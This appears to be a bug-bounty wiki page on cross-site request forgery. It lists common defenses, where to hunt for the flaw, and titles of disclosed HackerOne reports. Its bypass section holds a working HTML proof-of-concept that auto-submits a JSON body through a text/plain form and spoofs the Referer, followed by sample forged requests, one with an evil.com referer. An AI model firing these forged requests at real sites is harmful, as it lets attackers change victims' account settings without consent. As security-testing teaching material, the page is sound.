CSRF
CWE-352: Cross-Site Request Forgery (CSRF)
What it is ??
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.
CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
Methodology
CSRF Common Defenses
CSRF Tokens
SameSite Cookie
Json Content-Type
Requiring Re-authentication for Sensitive Actions
Double Submit Cookie Pattern
Origin and Referer Header Validation
Captchas
Custom Request Headers
CSRF Bypasses
<html>
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form name="hacker" method="POST" action="https://account.example.com/phone.json" enctype="text/plain">
<input type="hidden"
name= '{"phone":"01111111118","a":"' value='"}'>
</form>
<script>
history.pushState("", "", "/anything@account.example.com")
document.forms[0].submit();
</script>
</body>
</html>
------------------------------
# Request
POST /phone.json
Host: account.example.com
Cookie: session_cookie=YOUR_SESSION_COOKIE;
Referer: https://evil.com/test@example.com
{"phone":"01111111118","a":""}POST /phone.json
Host: account.example.com
Cookie: session_cookie=YOUR_SESSION_COOKIE;
Content type: application/json
{"phone":"01111111118","a":""}
--------------
POST /phone.json
Host: account.example.com
Cookie: session_cookie=YOUR_SESSION_COOKIE;
Content type: application/x-www-form-urlencoded
phone=01111111118
-----------------------------
POST /phone.json
Host: account.example.com
Cookie: session_cookie=YOUR_SESSION_COOKIE;
Content type: plain/text
phone=01111111118Slides
Where To Find
Authentication-Required Actions: Look for actions that require authentication, such as changing account settings, updating passwords, or making transactions. These are common areas where CSRF vulnerabilities can have significant impact.
User Profile Changes: Check for actions related to user profile changes, such as updating email addresses, changing personal information, or modifying profile pictures.
Account Deletion or Suspension: Actions that allow a user to delete or suspend their account could be targets for CSRF attacks.
Payment and Transactional Actions: Look for payment-related actions like making transactions, adding payment methods, or modifying subscription plans.
Form Submissions: Any action that involves form submissions could potentially be a target. This includes actions like submitting support tickets, submitting feedback, or submitting any kind of content.
CSRF Tokens: Some applications use CSRF tokens as a mitigation technique. Look for instances where CSRF tokens are missing or improperly validated. You might find CSRF tokens in hidden fields within HTML forms or as headers in AJAX requests.
Third-Party Integrations: If the application integrates with third-party services or APIs, check if these integrations are susceptible to CSRF attacks.
Changing Security Settings: Actions related to changing security settings, like enabling two-factor authentication (2FA) or changing security questions, can also be targets.
Privilege Escalation: Actions that involve escalating user privileges, such as changing a user's role or permissions, should be thoroughly tested for CSRF vulnerabilities.
Logging Out: Even the logout functionality can be exploited through CSRF attacks, forcing a victim to unknowingly log out.
Password Reset: If the password reset process doesn't include proper CSRF protections, an attacker could potentially change a user's password without their consent.
test login, logout, reset pass, change password, add-cart, like, comment, profile change, user details change, balance transfer, subscription, etc
Write-ups
Reports
CSRF on connecting Paypal as Payment Provider to Shopify - 287 upvotes, $500
Account Takeover using Linked Accounts due to lack of CSRF protection to Rockstar Games - 227 upvotes, $1000
Periscope android app deeplink leads to CSRF in follow action to Twitter - 204 upvotes, $1540
Chaining Bugs: Leakage of CSRF token which leads to Stored XSS and Account Takeover (xs1.tribalwars.cash) to InnoGames - 186 upvotes, $1100
Site wide CSRF affecting both job seeker and Employer account on glassdoor.com to Glassdoor - 152 upvotes, $3000
CSRF leads to a stored self xss to Imgur - 141 upvotes, $500
CSRF protection bypass in GitHub Enterprise management console to GitHub - 138 upvotes, $10000
Slack integration setup lacks CSRF protection to HackerOne - 134 upvotes, $2500
Lack of CSRF header validation at https://g-mail.grammarly.com/profile to Grammarly - 129 upvotes, $750
CSRF token validation system is disabled on Stripe Dashboard to Stripe - 105 upvotes, $2500
Cross-Site Request Forgery (CSRF) vulnerability on API endpoint allows account takeovers to Khan Academy - 101 upvotes, $0
CSRF Vulnerability on https://signin.rockstargames.com/tpa/facebook/link/ to Rockstar Games - 98 upvotes, $1000
CSRF to HTML Injection in Comments to WordPress - 94 upvotes, $950
One Click Account takeover using Ouath CSRF bypass by adding Null byte %00 in state parameter on www.streamlabs.com to Logitech - 85 upvotes, $200
CSRF in Account Deletion feature (https://www.flickr.com/account/delete) to Flickr - 82 upvotes, $750
Account takeover at https://try.discourse.org due to no CSRF protection in connecting Yahoo account to Discourse - 81 upvotes, $512
CSRF token validation system is disabled on Stripe Dashboard to Stripe - 80 upvotes, $2500
[CRITICAL] Full account takeover using CSRF to Twitter - 79 upvotes, $5040
CSRF Account Takeover to TikTok - 78 upvotes, $2373
Last updated
Was this helpful?